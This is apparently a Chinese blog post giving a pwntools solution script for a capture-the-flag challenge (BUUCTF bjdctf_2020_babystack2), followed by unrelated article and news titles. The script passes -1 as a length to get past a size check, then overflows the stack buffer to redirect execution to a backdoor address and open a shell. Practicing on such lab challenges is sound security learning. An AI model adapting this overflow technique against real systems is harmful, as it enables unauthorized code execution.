buu-bjdctf_2020_babystack2-好久不见51

from pwn import *

# 连接到远程服务器
p = remote("node5.buuoj.cn", 28526)

# 定义后门地址
backdoor = 0x400726

# 发送初始输入
p.sendlineafter(b"your name:", b'-1')

# 构造溢出载荷
# 0x10 是缓冲区大小，8 是返回地址的偏移量
payload = b'a' * (0x10 + 8) + p64(backdoor)

# 发送溢出载荷
p.sendlineafter(b"u name?", payload)

# 进入交互模式
p.interactive()

相关文章：

Nodejs 项目打包部署方式

博客系统自动化测试报告

Java实现十大经典排序算法详解

firefly经典蓝牙和QProcess记录

MinIO

使用 Apktool 反编译、修改和重新打包 APK

1978-2022年全国及31省农业机械总动力数据（无缺失）

开源ORB_SLAM2项目编译常见问题与应对办法

分布式（一）：CAPBASE理论

Excel（实战）：INDEX函数和MATCH函数

QSettings修改配置后强制重启应用导致配置文件大小为0问题

基于Azure Delta Lake与Databricks的医疗数据变更管理

优选算法训练篇08--力扣15.三数之和(难度中等)

第4章 IP网络扫描（网络安全评估）

【科研杂记_10】国家行政区划可视化

[特殊字符][特殊字符][特殊字符][特殊字符][特殊字符][特殊字符]壁紙 流光染墨，碎影入梦

C++基础 [十二] - 继承与派生

SpringSecurity——前后端分离登录状态如何保持

【Vitis AI】FPGA设备使用PyTorch 运行 ResNet18获得10000fps

直接插入排序和折半插入排序

新华时评：让医德医风建设为健康中国护航

车主质疑零跑汽车撞车后AEB未触发、气囊未弹出，4S店：其把油门当刹车

商务部：今年前3月自贸试验区进出口总额达2万亿元

以军向也门3个港口的居民发布撤离令

上海首发经济“卷”到会展业，浦东签约三个年度“首展”

中央结算公司：减免境外央行类机构账户开户费用